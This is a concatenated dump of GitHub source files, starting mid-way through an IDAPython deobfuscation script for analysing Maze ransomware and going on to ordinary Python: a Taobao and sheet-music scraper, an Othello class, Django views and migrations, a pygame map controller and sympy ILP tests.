?? ?? FF 20\",\n \"68 ?? ?? ?? ?? FF 21\",\n \"68 ?? ?? ?? ?? FF 22\",\n \"68 ?? ?? ?? ?? FF 23\",\n \"68 ?? ?? ?? ?? FF 24\",\n \"68 ?? ?? ?? ?? FF 25\",\n \"68 ?? ?? ?? ?? FF 26\",\n \"68 ?? ?? ?? ?? FF 27\",\n ],\n resolve_calls_through_register\n ),\n (\n [\n # .text:0041CBB5 83 C4 04 add esp, 4\n # .text:0041CBB8 FF 64 24 FC jmp dword ptr [esp-4]\n \"83 C4 04 FF 64 24 FC\",\n\n # .text:004239E3 44 inc esp\n # .text:004239E4 44 inc esp\n # .text:004239E5 44 inc esp\n # .text:004239E6 44 inc esp\n # .text:004239E7 FF 64 24 FC jmp dword ptr [esp-4]\n \"44 44 44 44 FF 64 24 FC\"\n ],\n deobfuscate_rets\n )\n]\n\n\ndef patch():\n for patterns, patch_function in PATCH_DATA:\n anything_patched = True\n\n while anything_patched:\n anything_patched = False\n\n for pattern in patterns:\n ea = -_pattern_len(pattern)\n\n while True:\n ea += _pattern_len(pattern)\n ea = idc.find_binary(ea, idc.SEARCH_NEXT | idc.SEARCH_DOWN | idc.SEARCH_CASE, pattern)\n if ea == ida_idaapi.BADADDR or idc.get_segm_name(ea) != '.text':\n break\n\n patched = bool(patch_function(ea))\n anything_patched |= patched\n\n if patched:\n print('[0x%08X] Code patched (%s)' % (ea, patch_function.__name__))\n\n print('[PATCHING FINISHED]')\n\n\npatch()\n","repo_name":"bahlaivlad/malware-analysis","sub_path":"maze/maze-deobfuscation-idapython.py","file_name":"maze-deobfuscation-idapython.py","file_ext":"py","file_size_in_byte":12220,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"71604366557","text":"import os\n\ndef bagging_output(results, method='average', path='./submit/bagging.csv', threshold=0.98):\n if method == 'average':\n for qid in results:\n results[qid] = sum(results[qid]) / float(len(results[qid]))\n elif method == 'hard':\n for qid in results:\n if sum(results[qid]) / float(len(results[qid])) > 0.5:\n results[qid] = threshold\n else:\n results[qid] = 1 - threshold\n\n results = sorted(results.items(), key=lambda item: item[0])\n\n file_out = open(path, 'w')\n file_out.write('id,label\\n')\n for i in range(len(results)):\n file_out.write('{},{}\\n'.format(results[i][0], results[i][1]))\n file_out.close()\n\nif __name__ == '__main__':\n path = 'deeps_1'\n\n results = {}\n for dirpath, dirnames, filenames in os.walk(os.path.join('submit', path)):\n for fn in filenames:\n if not fn.endswith('.csv'):\n continue\n file = open(os.path.join('submit', path, fn), 'r')\n line = file.readline()\n while True:\n line = file.readline()\n if line:\n qid, score = line.split(',', 1)\n qid, score = int(qid), float(score)\n if qid not in results:\n results[qid] = []\n\n results[qid].append(score)\n else:\n break\n\n file.close()\n\n\n if not os.path.exists('./submit/bagging'):\n os.makedirs('./submit/bagging')\n\n method = 'hard' # 'average'\n\n bagging_output(results, method=method, path='./submit/bagging/bagging_{}_{}.csv'.format(path, method))","repo_name":"chuzhumin98/DogsVsCatsRedux","sub_path":"bagging_method.py","file_name":"bagging_method.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"71228132000","text":"#\n# @lc app=leetcode.cn id=895 lang=python3\n#\n# [895] 最大频率栈\n#\n\n# @lc code=start\nimport collections\n\n\nclass FreqStack:\n\n def __init__(self):\n self.cnts = collections.defaultdict(int)\n self.group = collections.defaultdict(list)\n self.maxcnt = 0\n\n def push(self, val: int) -> None:\n cnt = self.cnts[val] + 1\n self.cnts[val] = cnt\n if cnt > self.maxcnt:\n self.maxcnt = cnt\n self.group[cnt].append(val)\n\n\n def pop(self) -> int:\n x = self.group[self.maxcnt].pop()\n self.cnts[x] -= 1\n if not self.group[self.maxcnt]:\n self.maxcnt -= 1\n return x\n\n\n# Your FreqStack object will be instantiated and called as such:\n# obj = FreqStack()\n# obj.push(val)\n# param_2 = obj.pop()\n# @lc code=end\n\n","repo_name":"Jvaeyhcd/.leetcode","sub_path":"895.最大频率栈.py","file_name":"895.最大频率栈.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"74111079839","text":"\"\"\"Initial 9\n\nRevision ID: ef3f101feb21\nRevises: de84556d9e2a\nCreate Date: 2021-11-14 06:45:24.012682\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nimport sqlmodel\n\n\n# revision identifiers, used by Alembic.\nrevision = 'ef3f101feb21'\ndown_revision = 'de84556d9e2a'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('images', sa.Column('url_600', sqlmodel.sql.sqltypes.AutoString(), nullable=True))\n \n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n \n op.drop_column('images', 'url_600')\n # ### end Alembic commands ###\n","repo_name":"madpin/renthub","sub_path":"main/app/alembic/versions/ef3f101feb21_initial_9.py","file_name":"ef3f101feb21_initial_9.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"33874662857","text":"class InvalidOthelloMoveError(Exception):\n '''Raised whenever an invalid move is made'''\n pass\n\n\nclass OthelloGameOver(Exception):\n '''\n Raised whenever there is no moves left for both players\n '''\n pass\n\n\nclass Othello:\n def __init__(self,num_rows:int,num_columns:int,initial_player:str,top_position:str,deafault:bool):\n '''initiates all self values of the othello class'''\n self.rows = num_rows\n self.columns = num_columns\n self.current_player = initial_player\n self.other_player = initial_player\n self.current_p_points = 0;\n self.other_p_points = 0;\n self.black = \"Black\"\n self.white = \"White\"\n self.NONE = ' '\n self.default = deafault\n self.game_over = False\n self.black_points = 2\n self.white_points = 2\n self.board = self.initialize_board(self.rows,self.columns,top_position)\n self.set_initial_player();\n \n def initialize_board(self,rows:int,columns:int,top_position)->[str]:\n '''Initializes the board with given colums, rows and top left most position player'''\n self._require_valid_column_number(columns-1)\n self._require_valid_row_number(rows-1)\n board = []\n if(top_position == self.black):\n other = self.white\n else:\n other = self.black\n for row in range(rows):\n board.append([])\n for col in range(columns):\n board[-1].append(self.NONE)\n board[int(row/2)][int(columns/2)-1] = top_position\n board[int(row/2)+1][int(columns/2)-1] = other\n board[int(row/2)][int(columns/2)] = other\n board[int(row/2)+1][int(columns/2)] = top_position\n return board\n \n def set_initial_player(self):\n '''sets the initial pleyer and other player'''\n if self.current_player == self.black:\n self.other_player = self.white\n else:\n self.other_player = self.black\n \n def _is_in_board(self,row_num:int ,col_num:int):\n '''checks if given row and column is in the board returns false if they are not'''\n return (self._is_valid_row_number(row_num)and self._is_valid_column_number(col_num))\n\n def get_player(self):\n '''return current player'''\n return self.current_player\n def opposite_player(self):\n '''return non current player'''\n return self.other_player\n\n def make_move(self,x:int, y:int):\n '''Given a row and a column computes move if not able than raises a exeption'''\n if self.game_over == True:\n raise OthelloGameOver()\n self._require_valid_row_number(x)\n self._require_valid_column_number(y)\n if self._is_in_board(x,y) == False:\n raise invalidOthelloMove()\n move_set = self._is_valid_move(x,y)\n if(move_set != []):\n self._flip_tiles(x,y,move_set)\n else:\n raise InvalidOthelloMoveError()\n self._update_points()\n self._compute_player()\n\n def _flip_tiles(self,x:int,y:int,move_set:[list])->None:\n '''Flip the tiles corresponing with given coordinates'''\n self.board[x][y] = self.current_player\n self.current_p_points +=1\n for move in move_set:\n x_move = x + move[0]\n y_move = y + move[1]\n while(self.board[x_move][y_move] != self.current_player):\n self.board[x_move][y_move] = self.current_player\n self.current_p_points +=1\n self.other_p_points -=1\n x_move += move[0]\n y_move += move[1]\n \n def _is_valid_move(self,x:int,y:int)->[list]:\n '''checks if given cordinates is a valid move for current player'''\n to_return = []\n if(self.board[x][y] != self.NONE):\n return to_return\n possible_moves = [[-1,-1],[-1,0],[-1,1],[0,-1],[0,1],[1,-1],[1,0],[1,1]]\n for move in possible_moves:\n x_move = x + move[0]\n y_move = y + move[1]\n while(self._is_in_board(x_move,y_move)):\n if(self.board[x_move][y_move] == self.NONE):\n break\n elif(self.board[x_move][y_move] == self.current_player):\n if(x + move[0] == x_move and y + move[1]== y_move):\n break\n else:\n to_return.append([move[0],move[1]])\n x_move += move[0]\n y_move += move[1]\n return to_return\n def get_winner(self)->str:\n '''returns the string contiang the winner in case of tie current is declare winner'''\n if(self.default == True):\n if(self.black_points > self.white_points):\n return 'The winnner is '+self.black\n elif(self.black_points < self.white_points):\n return 'The winnner is '+self.white\n else:\n if(self.black_points < self.white_points):\n return 'The winnner is '+self.black\n elif(self.black_points > self.white_points):\n return 'The winnner is '+self.white\n return \"Game is a Tie\"\n \n def has_valid_move(self,player:str)->bool:\n '''check if paramater player has a valid move'''\n prev_player = self.current_player\n self.current_player = player\n for i in range(self.rows):\n for j in range(self.columns):\n if(self._is_valid_move(i,j) != []):\n self.current_player = prev_player\n return True\n self.current_player = prev_player\n return False\n \n def _update_points(self)->None:\n '''Updates the points after flipping has occured'''\n if(self.current_player == self.black):\n self.black_points += self.current_p_points\n self.white_points += self.other_p_points\n else:\n self.black_points += self.other_p_points\n self.white_points += self.current_p_points\n self.other_p_points = 0\n self.current_p_points = 0\n def _compute_player(self):\n '''computes if players have valid moves if not raises exeption'''\n if(self.has_valid_move(self.other_player)):\n self._change_player()\n elif(self.has_valid_move(self.current_player)!= True and (self.has_valid_move(self.other_player) != True)):\n self.game_over = True\n raise OthelloGameOver()\n \n def _change_player(self):\n '''changes the player from current to other'''\n prev_player = self.current_player\n self.current_player = self.other_player\n self.other_player = prev_player\n \n def _require_valid_column_number(self,column_number: int) -> None:\n '''Raises a ValueError if its parameter is not a valid column number'''\n if type(column_number) != int or not self._is_valid_column_number(column_number):\n raise ValueError('column_number must be int between 0 and {}'.format(self.columns))\n\n def _require_valid_row_number(self,row_number: int) -> None:\n '''Raises a ValueError if its parameter is not a valid column number'''\n if type(row_number) != int or not self._is_valid_row_number(row_number):\n raise ValueError('row_number must be int between 0 and {}'.format(self.rows))\n \n def _is_valid_column_number(self,column_number: int) -> bool:\n '''Returns True if the given column number is valid; returns False otherwise'''\n return 0 <= column_number< self.columns\n\n\n\n def _is_valid_row_number(self,row_number: int) -> bool:\n '''Returns True if the given row number is valid; returns False otherwise'''\n return 0<= row_number < self.rows\n","repo_name":"oosantia/Othello","sub_path":"othello_class.py","file_name":"othello_class.py","file_ext":"py","file_size_in_byte":7744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"30162992789","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport jsonfield.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('fieldsight', '0069_merge'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='project',\n name='gsuit_meta',\n field=jsonfield.fields.JSONField(default={}),\n ),\n ]\n","repo_name":"fieldsight/fieldsight","sub_path":"onadata/apps/fieldsight/migrations/0070_project_gsuit_meta.py","file_name":"0070_project_gsuit_meta.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"51"} +{"seq_id":"20977584287","text":"import numpy as np\n\n\nclass NeuronGroup:\n def __init__(self, model, layer_id, dimension_ranges=None, neuron_idx_list=None):\n self.layer_id = layer_id\n if neuron_idx_list is not None:\n self.neuron_idx_list = neuron_idx_list\n else:\n self.neuron_idx_list = list()\n output_shape = model.layers[layer_id].output_shape[1:]\n for neuron_idx in np.ndindex(output_shape):\n if dimension_ranges is not None:\n if not self.neuron_in_range(dimension_ranges, neuron_idx):\n continue\n self.neuron_idx_list.append(neuron_idx)\n\n @staticmethod\n def neuron_in_range(dimension_ranges, neuron_idx):\n for dimension_idx, dimension_range in enumerate(dimension_ranges):\n if dimension_range[0] <= neuron_idx[dimension_idx] < dimension_range[1]:\n pass\n else:\n return False\n return True\n","repo_name":"uwdb/DeepEverest","sub_path":"NeuronGroup.py","file_name":"NeuronGroup.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"51"} +{"seq_id":"17247856170","text":"# encoding:utf-8\nimport re # 使用正则 匹配想要的数据\nimport requests # 使用requests得到网页源码\nimport xlwt\n\n# 得到主函数传入的链接\ndef getHtmlText(url):\n try: # 异常处理\n # 得到你传入的URL链接 设置超时时间3秒\n r = requests.get(url, timeout=3)\n # 判断它的http状态码\n r.raise_for_status()\n # 设置它的编码 encoding是设置它的头部编码 apparent_encoding是从返回网页中分析它的编码格式\n r.encoding = r.apparent_encoding\n # 返回源代码\n return r.text\n except: # 发生异常返回空\n return ''\n\n# 解析你的网页信息\ndef parsePage(ilt, html):\n # 异常处理\n try:\n # 找到价格\n plt = re.findall(r'\\\"view_price\\\"\\:\\\"[\\d\\.]*\\\"', html)\n # 找到名称\n tlt = re.findall(r'\\\"raw_title\\\"\\:\\\".*?\\\"', html)\n # 找到地址\n add = re.findall(r'\\\"item_loc\\\"\\:\\\".*?\\\"', html)\n # 找到付款人数\n sal = re.findall(r'\\\"view_sales\\\"\\:\\\"[\\d]*人付款\\\"', html)\n # 找到图片链接\n img = re.findall(r'\\\"pic_url\\\"\\:\\\".*?\\\"', html)\n # 得到这个内容放入主函数中的列表\n for i in range(len(plt)):\n price = eval(plt[i].split(':')[1])\n title = eval(tlt[i].split(':')[1])\n sales = eval(sal[i].split(\":\")[1])\n address = eval(add[i].split(':')[1])\n imgs = eval(img[i].split(':')[1])\n ilt.append([price, title, sales, address, imgs])\n except: # 放生异常输出空字符串\n print('')\n\n# 得到主函数传入的列表\ndef printGoodsList(ilt):\n count = 0 # 统计有多少的序号\n book = xlwt.Workbook(encoding='utf-8', style_compression=0) # style_compression:表示是否压缩,不常用。\n sheet = book.add_sheet('test', cell_overwrite_ok=True)\n\n sheet.write(0, 0, '序号')\n sheet.write(0, 1, '价格')\n sheet.write(0, 2, '商品名称')\n sheet.write(0, 3, '付款人数')\n sheet.write(0, 4, '地址')\n sheet.write(0, 5, '图片地址')\n\n for g in ilt:\n count = count + 1 # 循环一遍加一\n num = count\n #print(tplt.format(count, g[0], g[1], g[2]), g[3], g[4]) # 输出你得到的数据\n sheet.write(count, 0, num)\n sheet.write(count, 1, g[0])\n sheet.write(count, 2, g[1])\n sheet.write(count, 3, g[2])\n sheet.write(count, 4, g[3])\n sheet.write(count, 5, g[4])\n\n book.save(r'F:\\test1.xls') # 在字符串前加r,声明为raw字符串,这样就不会处理其中的转义了。否则,可能会报错\n\n# 定义主函数 main\ndef main():\n goods = '童装' # 你要搜索的东西\n depth = 1 # 你想要得到几页的东西\n start_url = 'https://s.taobao.com/search?q=' + goods # 你搜索的网址加上你的搜索东西\n infoList = [] # 自定义的空列表用来存放你的到的数据\n for i in range(depth): # 循环你的页数\n try: # 异常处理\n url = start_url + '&s' + str(44 * i) # 得到你的网址\n html = getHtmlText(url) # 得到url传入到你要得到url的函数中\n parsePage(infoList, html) # 得到你的html源码 放入解析的网页中\n except: # 发生异常跳过\n continue\n # 把列表中的数据放入解析的函数中\n printGoodsList(infoList)\n\n# 代码调试片段\nif __name__ == '__main__':\n main() # 调用主函数\n","repo_name":"zw398430866/study_code","sub_path":"02 Python/01 爬图程序/ClimbTest.py","file_name":"ClimbTest.py","file_ext":"py","file_size_in_byte":3484,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"16785464121","text":"from bs4 import BeautifulSoup\nimport urllib.request\nimport os\nimport re\nfrom pdf2image import convert_from_path\n\n\"\"\"\nHere is a script that scrapes the Mutopia Project at mutopiaproject.org for sheet music. The jpg files will be saved\nto a directory located at the path provided by the user at the bottom.\n\"\"\"\n\n\nclass SheetMusicScraper:\n\n def __init__(self):\n self.save_jpeg = input(\"Would you like the sheet music to be saved as jpegs (y/n)?\\n\")\n self.jpgs = []\n self.names = []\n self.composers = []\n\n def scrape(self, path):\n \"\"\"\n Scrape mutopiaproject.org for all of its sheet music in pdf format and save it to the path provided\n :param path: the path at which to save the pdf files\n \"\"\"\n if not os.path.exists(path):\n print(\"Path does not exist\")\n print(\"Creating directory...\")\n os.mkdir(path)\n print(\"Complete.\")\n else:\n print(\"Path exists! Saving data there.\")\n\n print(\"Scraping data...\")\n for i in range(0, 2111, 10):\n if i % 100 == 0:\n print(\"Sheet Music Page:\", i)\n url = \"http://www.mutopiaproject.org/cgibin/make-table.cgi?startat=\" + str(i) + \"&searchingfor=\" \\\n \"&Composer=&Instrument=&Style=&collection=&id=&solo=&recent=&timelength=1&timeunit=week&lilyversion=\" \\\n \"&preview=\"\n page = urllib.request.urlopen(url)\n soup = BeautifulSoup(page, 'html.parser')\n box = soup.findAll('table', attrs={\"class\": \"table-bordered result-table\"})\n box = str(box)\n count = 0\n while True:\n try:\n ex = re.search(r'((.*)', box)\n name = ex.group(1)\n self.names.append(name)\n try:\n ex = re.search(r'by (.*) \\(', box)\n composer = ex.group(1)\n except:\n print(\"Anonymous composer!\")\n composer = \"Anonymous\"\n self.composers.append(composer)\n box = box[box.index(\"Letter .pdf file\")+24:]\n if count == 0:\n print(\"Name:\", name)\n print(\"Composer:\", composer, \"\\n\")\n count += 1\n except:\n break\n\n # Now that we have the list of links that download the pdfs, we must request them and save them\n num = 0\n if (len(self.jpgs) == len(self.names)) and (len(self.jpgs) == len(self.composers)):\n print(\"Length check: Passed :)\")\n num = len(self.jpgs)\n else:\n print(\"Length check: Failed :(\")\n print(\"JPGs Length:\", len(self.jpgs))\n print(\"Names Length:\", len(self.names))\n print(\"Composers Length:\", len(self.composers))\n exit(0)\n print(\"Saving files to given directory...\")\n for i in range(num):\n res = urllib.request.urlopen(self.jpgs[i])\n # Make a directory for each composer, because why not.\n if not os.path.exists(path + self.composers[i]):\n os.mkdir(path + self.composers[i])\n # check if a '/' is in the filename. Replace it with some arbitrary character to avoid confusion\n if '/' in self.names[i]:\n self.names[i] = self.names[i].replace('/', ':')\n file = open(path + self.composers[i] + '/' + self.names[i] + '.pdf', 'wb') # must save as pdf first\n file.write(res.read())\n file.close()\n # Now convert saved pdf to jpg\n if self.save_jpeg.lower()[0] == 'y':\n pages = convert_from_path(path + self.composers[i] + '/' + self.names[i] + '.pdf', 500)\n page_count = 1\n for page in pages:\n page.save(path + self.composers[i] + '/' + self.names[i] + 'Page' + str(page_count) + '.jpg', 'JPEG')\n page_count += 1\n print(\"Saving complete.\")\n print(\"Script execution complete!\")\n\n\nif __name__ == \"__main__\":\n sheet_scraper = SheetMusicScraper()\n path = input(\"Enter the path at which you'd like the dataset to be saved:\\n\")\n if not path.endswith('/'):\n path += '/'\n sheet_scraper.scrape(path)\n","repo_name":"npool9/SheetMusicScraper","sub_path":"sheetmusic_scraper.py","file_name":"sheetmusic_scraper.py","file_ext":"py","file_size_in_byte":4564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"33344103316","text":"from django.shortcuts import render\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom .models import item\n\n# get all the items\ndef HomePage(request):\n all_items = item.objects.all()\n return render(request, \"home.html\", {\"all_items\": all_items})\n\n\n# add an item\ndef addItem(request):\n content = request.POST[\"content\"]\n new_item = item(content=content, name=\"chocolate\", price=111)\n new_item.save()\n return HttpResponseRedirect(\"/home/\")\n\n\n# delete an item\ndef deleteItem(request, item_id):\n Deleteitem = item.objects.get(id=item_id)\n Deleteitem.delete()\n return HttpResponseRedirect(\"/home/\")\n\n\n# update an item\ndef updateItem(request, item_id):\n updateItem = item.objects.get(id=item_id)\n return render(request, \"update.html\", {\"updateItem\": updateItem})\n\n\ndef updateItemPage(request):\n updated_Item = item(\n id=request.POST[\"item_id\"],\n content=request.POST[\"content\"],\n name=request.POST[\"name\"],\n price=request.POST[\"price\"],\n )\n updated_Item.save()\n return HttpResponseRedirect(\"/home/\")\n\n\ndef itemDetailsView(request, item_id):\n requireditem = item.objects.get(id=item_id)\n return render(request, \"itemDetailsPage.html\", {\"item\": requireditem})","repo_name":"Md-Golam-Sarowar/Django-inventory-app","sub_path":"todoApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"43194826909","text":"from rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom indj_mir.com.indj.mir.services import FastDTW\nfrom rest_framework import permissions\nfrom rest_framework.decorators import api_view, permission_classes\nfrom indj_mir.com.indj.mir.services import HandleAudioFile\nimport sys\n\n\n@api_view(['POST'])\n@permission_classes((permissions.AllowAny,))\ndef execute_all_songs(request):\n try:\n print('Start handling ....')\n HandleAudioFile.handle_all_files_mp3()\n FastDTW.calculate_all_songs()\n return Response(status=status.HTTP_201_CREATED)\n except Exception as ex:\n sys.stderr(ex)\n return Response(ex.__cause__, status=status.HTTP_400_BAD_REQUEST)\n\n\n@api_view(['POST'])\n@permission_classes((permissions.AllowAny,))\ndef execute_source_uid(request):\n try:\n print('--- Start handling ...')\n print('sourceUID: ', request.data['sourceUID'])\n HandleAudioFile.handle_song_uid(request.data['sourceUID'])\n HandleAudioFile.convert_mp3_wav(request.data['sourceUID'] + '.mp3')\n FastDTW.calculate_mfcc(request.data['sourceUID'] + '.mp3')\n HandleAudioFile.remove_mp3_wav_file(request.data['sourceUID'] + '.mp3')\n FastDTW.calculate_by_source_uid(request.data['sourceUID'])\n return Response(status=status.HTTP_201_CREATED)\n except Exception as ex:\n sys.stderr(ex)\n return Response(ex.__cause__, status=status.HTTP_400_BAD_REQUEST)\n","repo_name":"trinhkhoi/MIR","sub_path":"indj_mir/com/indj/mir/controllers/FastDTWController.py","file_name":"FastDTWController.py","file_ext":"py","file_size_in_byte":1507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"26354011887","text":"# OpenRTS - Copyright (C) 2006 The OpenRTS Project\r\n#\r\n# OpenRTS is free software; you can redistribute it and/or modify\r\n# it under the terms of the GNU General Public License as published by\r\n# the Free Software Foundation; either version 2 of the License, or\r\n# (at your option) any later version.\r\n# \r\n# OpenRTS is distributed in the hope that it will be useful, but\r\n# WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\r\n# General Public License for more details.\r\n\r\nimport pygame\r\nimport logging\r\nfrom pygame.locals import *\r\n\r\n#****************************************************************************\r\n# Mapctrl handles user-input on the main map view, and tells the client\r\n# what to do.\r\n#****************************************************************************\r\nclass Mapctrl:\r\n\r\n def __init__(self, gameclient):\r\n self.client = gameclient;\r\n self.selected_units = {};\r\n self.mouse_state = \"default\";\r\n\r\n#****************************************************************************\r\n# Handle input events from pygame.\r\n#****************************************************************************\r\n def handle_events(self):\r\n for event in pygame.event.get():\r\n if event.type == QUIT:\r\n self.client.quit()\r\n elif event.type == KEYDOWN and event.key == K_ESCAPE:\r\n self.client.quit();\r\n elif event.type == KEYDOWN and event.key == K_RETURN:\r\n self.client.mappanel.send_chat();\r\n elif event.type == KEYDOWN and event.key == K_f:\r\n logging.info(self.client.clock.get_fps());\r\n elif event.type == KEYDOWN and event.key == K_a:\r\n self.set_mouse_state('attack');\r\n elif event.type == MOUSEBUTTONDOWN:\r\n self.handle_mouse_click(pygame.mouse.get_pos(), event.button);\r\n elif event.type == MOUSEBUTTONUP:\r\n self.handle_mouse_release(pygame.mouse.get_pos(), event.button);\r\n elif event.type == MOUSEMOTION:\r\n self.mouse_motion(pygame.mouse.get_pos())\r\n\r\n self.client.mappanel.app.event(event);\r\n\r\n self.client.mapview.cursor.update(event);\r\n\r\n#****************************************************************************\r\n# Handles all mouse click events from Pygame.\r\n#****************************************************************************\r\n def handle_mouse_click(self, pos, button):\r\n if button == 1:\r\n (x, y) = pos; \r\n if self.mouse_state == \"default\":\r\n self.select_pos_start = pygame.mouse.get_pos(); \r\n self.select_pos_end = pygame.mouse.get_pos(); \r\n self.set_mouse_state('select');\r\n \r\n if self.mouse_state == 'goto':\r\n self.handle_goto(x, y); \r\n elif button == 3:\r\n map_pos = self.client.mapview.canvas_to_map(pos); \r\n self.client.mapview.center_view_on_tile(map_pos);\r\n\r\n self.client.mappanel.handle_mouse_click(pos);\r\n\r\n#****************************************************************************\r\n# Handles all mouse release events from Pygame.\r\n#****************************************************************************\r\n def handle_mouse_release(self, pos, button):\r\n if button == 1 and self.mouse_state == 'select': \r\n self.define_tiles_within_rectangle();\r\n\r\n#****************************************************************************\r\n#\r\n#****************************************************************************\r\n def handle_goto(self, canvas_x, canvas_y):\r\n self.set_mouse_state('default');\r\n map_pos = self.client.mapview.canvas_to_map((canvas_x, canvas_y));\r\n for unit in self.selected_units.values():\r\n logging.info(\"Selected unit id %r\" % unit.id);\r\n start_tile = self.client.map.get_tile_from_unit(unit);\r\n end_tile = self.client.map.get_tile(map_pos);\r\n logging.info(\"dist %r\" % self.client.map.get_distance(start_tile, end_tile));\r\n if self.client.map.get_distance(start_tile, end_tile) > 40:\r\n logging.info(\"Distance is too long.\");\r\n return;\r\n self.client.map.find_path(unit,\r\n self.client.ruleset,\r\n start_tile, end_tile);\r\n \r\n\r\n#****************************************************************************\r\n#\r\n#****************************************************************************\r\n def define_tiles_within_rectangle(self):\r\n w = self.client.tileset.tile_width / 2;\r\n h = self.client.tileset.tile_height / 12;\r\n half_w = w / 2;\r\n half_h = h / 2;\r\n (x1, y1) = self.select_pos_start;\r\n (x2, y2) = self.select_pos_end;\r\n rec_w = x2 - x1;\r\n rec_h = y2 - y1;\r\n segments_x = abs(rec_w/ half_w);\r\n segments_y = abs(rec_h/ half_h);\r\n self.selected_units = {};\r\n\r\n self.set_mouse_state('default') \r\n \r\n # Iteration direction \r\n if rec_w > 0:\r\n inc_x = half_w;\r\n else:\r\n inc_x = -half_w;\r\n if rec_h > 0:\r\n inc_y = half_h;\r\n else:\r\n inc_y = -half_h;\r\n \r\n y = y1;\r\n yy = 0;\r\n while (yy <= segments_y): \r\n x = x1;\r\n xx = 0;\r\n while (xx <= segments_x):\r\n map_pos = self.client.mapview.canvas_to_map((x, y));\r\n unit = self.client.map.get_unit(map_pos);\r\n if unit: \r\n self.selected_units.update({map_pos:unit});\r\n self.set_mouse_state('goto');\r\n yy += 1;\r\n y += inc_y;\r\n xx += 1;\r\n x += inc_x;\r\n logging.info(\"Selected %r units\" % len(self.selected_units.values()));\r\n\r\n\r\n#****************************************************************************\r\n# The mouse moved, do a scroll. \r\n#****************************************************************************\r\n def mouse_motion(self, pos):\r\n (x, y) = pos;\r\n# if y > self.client.mapview.mapcanvas.get_height(): \r\n# self.client.mapview.cursor.disable();\r\n# else:\r\n# self.client.mapview.cursor.set_cursor_type(self.mouse_state);\r\n if self.mouse_state == 'select':\r\n self.select_pos_end = pygame.mouse.get_pos(); \r\n\r\n\r\n#****************************************************************************\r\n#\r\n#****************************************************************************\r\n def set_mouse_state(self, state):\r\n\r\n if state == 'default':\r\n self.client.mapview.cursor.disable();\r\n else:\r\n self.client.mapview.cursor.set_cursor_type(state);\r\n\r\n self.mouse_state = state;\r\n\r\n","repo_name":"Donkyhotay/openrts","sub_path":"client/mapctrl.py","file_name":"mapctrl.py","file_ext":"py","file_size_in_byte":6390,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"51"} +{"seq_id":"2935896860","text":"import unittest\nfrom sympy import *\n\nfrom ..solver import *\nfrom .test_case_lib import *\nfrom .test_helper import *\n\ncases = get_cases()\n# case = cases[-1]\ncase = cases[8]\n\n# p402, p83, p199, p14, p145, p205, p390, p189, p471, p500 = symbols('p402 p83 p199 p14 p145 p205 p390 p189 p471 p500')\n\n# obj_fn = p14 + 12*p145 + p189 + 2*p199 + 3*p390 + p471 + 3*p83\n\n# b = [\n# p402 <= 3,\n# p83 <= 3,\n# p199 + 9*p205 + 9*p471 <= 3,\n# p14 <= 3,\n# p145 <= 3,\n# p390 <= 3,\n# p189 <= 3,\n# p500 <= 3,\n# p145 + p402 <= 5,\n# p14 + p199 + p205 + p390 + p471 + p500 + p83 <= 5,\n# p189 <= 3,\n# 75*p14 + 40*p145 + 45*p189 + 55*p199 + 45*p205 + 60*p390 + 55*p402 + 50*p471 + 55*p500 + 50*p83 <= 1000,\n# p14 + p145 + p189 + p199 + p205 + p390 + p402 + p471 + p500 + p83 <= 3,\n# p14 + p145 + p189 + p199 + p205 + p390 + p402 + p471 + p500 + p83 >= 3\n# ]\n\n# case = Binary_ILP_case([p402, p83, p199, p14, p145, p205, p390, p189, p471, p500], obj_fn, b)\n\n\nclass TestDebug(unittest.TestCase):\n\n def setUp(self): # This runs at the beginning of every test case\n self.result = case.solve(case.algo.implicit_enumeration, print_run_count=True)\n\n def test_all_solve_methods_get_same_result(self):\n\n result = run_all_algos(case, True)\n\n self.assertEqual(result['a'].obj_val, result['b'].obj_val)\n self.assertEqual(result['a'].obj_val, result['c'].obj_val)\n\n def test_objective_val_is_correct(self):\n\n if self.result.obj_val != -oo:\n direct_obj_val = case.get_obj_fn_val(case.obj_fn, self.result.var_vals)\n self.assertEqual(self.result.obj_val, direct_obj_val)\n\n def test_all_constraints_met(self):\n\n print('The final result is: ', self.result)\n\n if self.result.obj_val != -oo:\n self.assertTrue(case.is_feasible(b=case.b, var_vals=self.result.var_vals, debug=False))\n\n\nif __name__ == '__main__':\n 